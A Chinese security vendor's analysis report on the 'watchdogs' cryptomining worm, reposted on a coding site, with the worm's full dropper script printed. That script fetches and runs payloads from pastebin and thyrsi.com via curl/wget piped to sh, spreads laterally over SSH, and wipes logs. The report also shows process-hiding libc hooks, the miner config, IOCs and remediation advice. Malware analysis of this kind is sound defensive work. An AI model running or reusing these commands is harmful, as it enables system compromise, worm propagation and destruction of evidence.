watchdogs挖矿木马综合分析报告

栏目: 编程工具 · 发布时间: 5年前

watchdogs挖矿木马综合分析报告

2019221日晚, 默安科技应急响应中心接到某合作伙伴的求助电话,针对被 watchdogs 病毒感染的机子进行排查和分析,并最终给出了针对该类型的挖矿病毒的清除工具,帮助客户清除病毒文件,修复被感染机子,挽回经济损失。经默安科技影武者实验室安全研究员分析发现,该病毒是通过 Redis 未授权访问漏洞及 ssh 弱口令进行突破植入,随后释放挖矿木马进行挖矿操作,并对内外网主机进行 redis 漏洞攻击及 ssh 暴力破解攻击。该病毒有以下几个特征信息:

1、 查看 netstat 命令是否被删除。

2、 查看 /root/.ssh 中的密钥信息是否被清除。

3、 查看计划任务,是否存在以下任务信息:

curl -fsSL http://thyrsi.com/t6/672/1550667515x1822611209.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550667515x1822611209.jpg -O /tmp/watchdogs

4、 使用 busybox 检查可以进程:

busybox ps -ef|grep watchdogs

busybox ps -ef|grep ksoftirqds

如果包含则说明中毒。

5 、病毒程序执行后会消耗大量的主机 cpu 资源。

请各位系统维护人员检查各自机子是否有以上特征,如果有以上特征,可联系默安科技安全应急响应中心获取病毒清除工具。

下面对该病毒进行详细地分析。

0x1 Watchdogs程序

由于病毒程序使用 golang 编写的,做了一些混淆操作, ida 无法识别其中的符号信息,需要手动修复一下,可使用以下 idapython 脚本进行修复,修复后可还原一部分方法名,便于之后的分析:

https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro

通过脚本还原符号信息,重命名了 3946 个方法。

修复前:

watchdogs挖矿木马综合分析报告

修复后:

watchdogs挖矿木马综合分析报告

下面分析主函数 main.main()

Main 函数中主要工作是:

0x1 将wathdogs这个进程设置为系统服务

0x2 将libioset写入到/etc/ld.so.preload中

0x3 将写入定时任务,远程下载挖矿文件

0x4 启动ksoftirqds进程进行挖矿操作

0x5 删除tmp下ksoftirqds,watchdogs,config.json等文件

0x6 更新程序

0x7 redis 未授权攻击及ssh暴力破解攻击

watchdogs挖矿木马综合分析报告

由于控制流图太大,这里就不给出了,下面是 main 函数中的主要代码,已经做了详细的注释:

watchdogs挖矿木马综合分析报告

watchdogs 添加为系统服务

watchdogs挖矿木马综合分析报告

这里大概的意思是将 libioset.so 写入奥 /etc/local/ld.so.preload 。通过这种方式将 libioset.so 设置为预加载的动态链接库,这样即使程序不依赖 libioset.solibioset.so 依然会被装载。

watchdogs挖矿木马综合分析报告

这里是写入配置信息到文件 /tmp/config.json

watchdogs挖矿木马综合分析报告

这里是写入定时任务(位于: github_com_hippies_LSD_LSDC_Cron 函数中)

watchdogs挖矿木马综合分析报告

通过查看计划任务发现。

15 分钟执行一次更新下载操作:

watchdogs挖矿木马综合分析报告

通过网页访问这个 url 发现其是一段 base64 加密的数据

watchdogs挖矿木马综合分析报告

脚本内容分析如下:

15 分钟从 pastebin 上下载经过 base64 编码的该脚本自身并写入到定时任务中:

export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin

echo "*/15 * * * * (curl -fsSL https://pastebin.com/raw/sByq0rym||wget -q -O- https://pastebin.com/raw/sByq0rym)|sh" | crontab -

关闭其他可能存在的挖矿木马:

ps auxf | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -9

ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill -9

ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill -9

ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill -9

ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9

ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9

ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "xig" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "wnTKYg" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "sustes" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "thisxxs" | awk '{print $2}' | xargs kill -9

ps auxf|grep -v grep|grep "hashfish" | awk '{print $2}'|xargs kill -9

ps auxf|grep -v grep|grep "kworkerds" | awk '{print $2}'|xargs kill -9

通过 chattr 指令锁定系统权限,关闭资源占用较高的服务:

chattr -i /etc/cron.d/root

chattr -i /etc/cron.d/system

chattr -i /etc/ld.so.preload

chattr -i /etc/cron.d/apache

chattr -i /var/spool/cron/root

chattr -i /var/spool/cron/crontabs/root

chattr -i /usr/local/bin/dns

chattr -i /usr/sbin/netdns

chattr -i /bin/netstat

rm -rf /etc/cron.d/system /etc/cron.d/apache /etc/cron.hourly/oanacron /etc/cron.daily/oanacron /etc/cron.monthly/oanacron /usr/local/lib/libn

tp.so /etc/init.d/netdns /etc/init.d/kworker /bin/httpdns /usr/local/bin/dns /bin/netstat /usr/sbin/netdns

chkconfig --del kworker

chkconfig --del netdns

p=$(ps auxf|grep -v grep|grep ksoftirqds|wc -l)

if [ ${p} -eq 0 ];then

    ps auxf|grep -v grep | awk '{if($3>=80.0) print $2}'| xargs kill -9

fi

杀掉一些 DDoS 进程:

if [ -e "/tmp/gates.lod" ]; then

    rm -rf $(readlink /proc/$(cat /tmp/gates.lod)/exe)

    kill -9 $(cat /tmp/gates.lod)

    rm -rf $(readlink /proc/$(cat /tmp/moni.lod)/exe)

    kill -9 $(cat /tmp/moni.lod)

    rm -rf /tmp/{gates,moni}.lod

fi

根据内核版本下载病毒程序并执行:

if [ ! -f "/tmp/.lsdpid" ]; then

    ARCH=$(uname -m)

    if [ ${ARCH}x = "x86_64x" ]; then

        (curl -fsSL http://thyrsi.com/t6/672/1550667479x1822611209.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550667479x18226112

09.jpg -O /tmp/watchdogs) && chmod +x /tmp/watchdogs

    elif [ ${ARCH}x = "i686x" ]; then

        (curl -fsSL http://thyrsi.com/t6/672/1550667515x1822611209.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550667515x18226112

09.jpg -O /tmp/watchdogs) && chmod +x /tmp/watchdogs

    else

        (curl -fsSL http://thyrsi.com/t6/672/1550667515x1822611209.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550667515x18226112

09.jpg -O /tmp/watchdogs) && chmod +x /tmp/watchdogs

    fi

        nohup /tmp/watchdogs >/dev/null 2>&1 &

elif [ ! -f "/proc/$(cat /tmp/.lsdpid)/stat" ]; then

    ARCH=$(uname -m)

    if [ ${ARCH}x = "x86_64x" ]; then

        (curl -fsSL http://thyrsi.com/t6/672/1550667479x1822611209.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550667479x18226112

09.jpg -O /tmp/watchdogs) && chmod +x /tmp/watchdogs

    elif [ ${ARCH}x = "i686x" ]; then

        (curl -fsSL http://thyrsi.com/t6/672/1550667515x1822611209.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550667515x18226112

09.jpg -O /tmp/watchdogs) && chmod +x /tmp/watchdogs

    else

        (curl -fsSL http://thyrsi.com/t6/672/1550667515x1822611209.jpg -o /tmp/watchdogs||wget -q http://thyrsi.com/t6/672/1550667515x18226112

09.jpg -O /tmp/watchdogs) && chmod +x /tmp/watchdogs

    fi

        nohup /tmp/watchdogs >/dev/null 2>&1 &

fi

通过读取 .ssh 目录下 known_hosts 中的服务器地址,尝试使用密钥登录后横向传播:

if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then

  for h in $(grep -oE "b([0-9]{1,3}.){3}[0-9]{1,3}b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChec

king=no $h '(curl -fsSL https://pastebin.com/raw/sByq0rym||wget -q -O- https://pastebin.com/raw/sByq0rym)|sh >/dev/null 2>&1 &' & done

fi

echo 0>/root/.ssh/authorized_keys

echo 0>/var/spool/mail/root

echo 0>/var/log/wtmp

echo 0>/var/log/secure

echo 0>/var/log/cron

具体的可参考我们公司上一篇分析文章:

https://mp.weixin.qq.com/s/7HyO9gVdgDYL4x7DKCVgZA

这里是检查更新:

watchdogs挖矿木马综合分析报告

病毒文件会定时向服务端请求更新信息。

通过 tcpdump 进行协议抓包分析,发现有挖矿行为:

watchdogs挖矿木马综合分析报告

通过 htop 进行进程分析,发现会启动以下的进程, cpu 占用率极高

watchdogs挖矿木马综合分析报告

通过使用 inotify 监视 bin 目录,发现其删除了一个 netstat 命令

watchdogs挖矿木马综合分析报告

通过分析可知该计划任务会定时从服务端下载一张图片格式文件并重命名为 watchdogs 保存到 tmp 目录下并执行,执行过程中会释放 config.jsonksoftirqdstmp 目录下。为了防止被捕获,在程序执行后,对 watchdogsconfig.jsonksoftrqds 进行了删除操作。

watchdogs挖矿木马综合分析报告

另外为了隐藏进程信息及相关的文件信息,该病毒通过 hook 方式对 libc.so 中的函数进行了重写。

如:

readdir 函数

这里有一个 do while 结构

do

  {

    v4 = old_readdir(a1);                       // 使用readdir打开一个目录

    if ( v4 )

    {

      if ( (unsigned int)get_dir_name(a1, &s1, 0x100uLL)// 调用getdirname

        && !strcmp(&s1, "/proc")

        && (unsigned int)get_process_name(v4 + 19, &v3)

        && !strcmp(&v3, "ksoftirqds") )

      {

        return 0LL;

      }

      if ( !strcmp(&v3, "watchdogs") )

        return 0LL;

    }

    if ( v4 && !strcmp((const char *)(v4 + 19), ".") )

      strcmp((const char *)(v4 + 19), "/");

  }

  while ( v4

       && (strstr((const char *)(v4 + 19), "ksoftirqds")// 判断ksoftirqds是否是v4+19这个地址中的字符串的子集

        || strstr((const char *)(v4 + 19), "ld.so.preload")

        || strstr((const char *)(v4 + 19), "libioset.so")) );

大致的意思是:

如果查询结果中包含恶意应用名称及路径,则不返回相应结果,起到隐藏作用。

另外程序也对 rmdir 函数进行了重写,防止恶意程序的文件被删除。

这里是重写的函数列表

watchdogs挖矿木马综合分析报告

其中作者不仅在 access 函数中做了隐藏操作,而且还进行了写入计划任务的操作:

  s = fopen("/etc/cron.d/root", "w+");

  if ( s )

  {

    fwrite(

      "*/10 * * * * root (curl -fsSL https://pastebin.com/raw/sByq0rym||wget -q -O- https://pastebin.com/raw/sByq0rym)|shn##",

      1uLL,

      0x75uLL,

      s);

    fclose(s);

  }

横向传播

0x1 攻击 redis 服务器

遍历内网 ip 及外网 ip 攻击 redis 服务器:

测试机上通过 wireshark 抓取到的 redis 攻击行为

watchdogs挖矿木马综合分析报告

调用过程:

Main.main

->github_com_hippies_LSD_LSDA_Ago

->github_com_hippies_LSD_Ago_func1

->github_com_hippies_LSD_LSDA_runtwo

->github_com_hippies_LSD_LSDA_run

->github_com_gomodule_redigo_redis_DialTimeout

->github_com_gomodule_redigo_redis_Dial

->github_com_gomodule_redigo_redis__conn_Do

->github_com_gomodule_redigo_redis__conn_DoWithTimeout

->github_com_gomodule_redigo_redis__conn_writeCommand

相关代码:

watchdogs挖矿木马综合分析报告

0x2 ssh 爆破

watchdogs挖矿木马综合分析报告

调用过程:

Main.main

-> github_com_hippies_LSD_LSDA_Bbgo

-> github_com_hippies_LSD_LSDA_bgo

-> github_com_hippies_LSD_LSDA_bgo_func1

-> github_com_hippies_LSD_LSDA_cmdtwo

->github_com_hippies_LSD_LSDA_cmd

->golang_org_x_crypto_ssh__Client_NewSession

部分控制流图:

watchdogs挖矿木马综合分析报告

相关源码

watchdogs挖矿木马综合分析报告

0x2 针对ksoftirqds的分析(挖矿)

病毒程序在释放出 ksoftirqds 后会将其删除,如果我们想分析 ksoftirqds 的话,需要将 tmp 目录使用 chattr +a /tmp 命令锁住,这样可以防止这些文件被删除。

通过分析发现,这个木马文件和 watchdogs 一样,也是用 upx 加壳的。我们使用 upx 工具执行 upx -d 即可脱壳。

下面是分析过程:

首先使用 ida 的字符串检索功能,找到如下矿池地址:

watchdogs挖矿木马综合分析报告

搜索 xmr.f2pool.com

跟入并寻找引用位置

找到了钱包地址:

watchdogs挖矿木马综合分析报告

这部分配置在 do_guided_pool_config 函数中,做矿池配置

Main()->do_guided_pool_config()

do_guided_pool_config中主要做了

pool_address,wallet_address,rig_id,pool_password,use_nicehash,use_tls等这些参数的配置。

并通过 GetPoolConfig 函数获取相应的矿池配置文件:

矿机配置文件信息 config.json 文件如下:

{

    "algo": "cryptonight",

    "api": {

        "port": 0,

        "access-token": null,

        "id": null,

        "worker-id": null,

        "ipv6": false,

        "restricted": true

    },

    "asm": true,

    "autosave": true,

    "av": 0,

    "background": false,

    "colors": true,

    "cpu-affinity": null,

    "cpu-priority": null,

    "donate-level": 0,

    "huge-pages": true,

    "hw-aes": null,

    "log-file": null,

    "max-cpu-usage": 100,

    "pools": [

        {

            "url": "stratum+tcp://xmr.f2pool.com:13531",

            "user": "46FtfupUcayUCqG7Xs7YHREgp4GW3CGvLN4aHiggaYd75WvHM74Tpg1FVEM8fFHFYDSabM3rPpNApEBY4Q4wcEMd3BM4Ava.teny",

            "pass": "x",

            "rig-id": null,

            "nicehash": false,

            "keepalive": false,

            "variant": -1,

            "tls": false,

            "tls-fingerprint": null

        }

    ],

    "print-time": 60,

    "retries": 5,

    "retry-pause": 5,

    "safe": false,

    "threads": null,

    "user-agent": null,

    "watch": false

}

通过分析发现,该木马使用的是一款名叫 xmr-stak 的挖矿程序

watchdogs挖矿木马综合分析报告

它的项目地址地址在 https://github.com/fireice-uk/xmr-stak

watchdogs挖矿木马综合分析报告

对应的 github 项目的特征位置:

watchdogs挖矿木马综合分析报告

这款挖矿系统除了能够挖掘门罗币,还能够挖掘以下的虚拟货币:

watchdogs挖矿木马综合分析报告

0x3 分析总结

1、 watchdogs 中写入定时任务,释放 ksoftirqds 进行挖矿,并每个 15 分钟检查更新,

2、 进行 ssh 爆破及 redis 攻击,目的是进行横向病毒传播,扩大挖矿僵尸网络的势力。

3ksofttirqds 程序主要是使用 xmr-stak 挖矿程序挖掘门罗币。

4 、矿池:

tcp://xmr.f2pool.com:13531

5 、钱包地址为:

46FtfupUcayUCqG7Xs7YHREgp4GW3CGvLN4aHiggaYd75WvHM74Tpg1FVEM8fFHFYDSabM3rPpNApEBY4Q4wcEMd3BM4Ava.tenx

6. 、域名:

http://thyrsi.com

https://pastebin.com

对应 ip

104.27.139.223

104.20.209.21

7 、相关特征 MD5 值:

aee3a19beb22527a1e0feac76344894c

86e2f5859ca276f307a034b5c7c450f1

ae356f2499b2228e86bcc4d61f4a29c9

d6a146161ec201f9b3f20fbfd528f901

a48f529646b8b5e96bab67d6d517a975

04ca88d563b568bac6d1f64faf4d390e

8 、为什么无法删除文件和 kill 进程?

蠕虫通过 ld.so.preload 使用 libioset.so 对常见系统函数(如: readdiraccess 函数)进行过滤,当返回结果中包含恶意文件和进程时,会主动过滤和隐藏相关结果,使用 lsps 等命令无法看到恶意进程文件。

9 、如何清理?

上传 busybox/bin/ 目录下,使用 busybox 清理文件。

10 、为什么 busybox 可以清理文件?

busybox 不依赖于系统的动态库,不受 ld.so.preload 劫持,能够正常操作文件。

0x4 加固建议

病毒程序可能是通过利用 redis 未授权漏洞植入,所以请做好 redis 方面的加固。

Redis 未授权漏洞简介: Redis 在默认配置下,会将服务绑定在 0.0.0.06379 上,即暴露在公网上。如果同时又没有开启相关的认证,就会导致任意用户访问 redis 服务,进行数据库操作,并且通过进一步利用,还可以获得系统权限。

以下是 redis 方面的加固建议:

1.  将修改 redis 配置文件,将服务绑定在本机 127.0.0.1 上。

3 、修改 redis.conf ,设置访问认证,启用密码认证。
3.  在防火墙处指定可访问 redis 服务的 ip

4.  修改修改 redis 默认端口。

5.  禁用 config 指令防止恶意操作,这样即使存在未授权访问,也能够给攻击者使用 config  指令加大难度。

6. 使用普通权限运行 redis 服务,这样即使攻击者获得了服务器权限也只是普通用户权限。

0x5 病毒处置办法

1 )默安科技已针对病毒开发自动化清理脚本,脚本地址:

https://github.com/MoreSecLab/DDG_MalWare_Clean_Tool

3 )建议使用默安科技哨兵云对全网服务器进行排查 Redis 未授权访问漏洞并进行安全加固,从源头上避免感染病毒。

4 )紧急情况下,为避免内网大量传播,可以临时对被感染机器先进行断网隔离处理。

5 )不影响业务的情况下,建议临时删除机器上 .ssh/known_hosts 和登录密钥文件。

相关文章:

https://mp.weixin.qq.com/s/7HyO9gVdgDYL4x7DKCVgZA

By 默安科技安全应急响应中心

2019/2/25


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

Python Data Structures and Algorithms

Python Data Structures and Algorithms

Benjamin Baka / Packt Publishing / 2017-5-30 / USD 44.99

Key Features A step by step guide, which will provide you with a thorough discussion on the analysis and design of fundamental Python data structures.Get a better understanding of advanced Python c......一起来看看 《Python Data Structures and Algorithms》 这本书的介绍吧!

随机密码生成器
随机密码生成器

多种字符组合密码

SHA 加密
SHA 加密

SHA 加密工具

正则表达式在线测试
正则表达式在线测试

正则表达式在线测试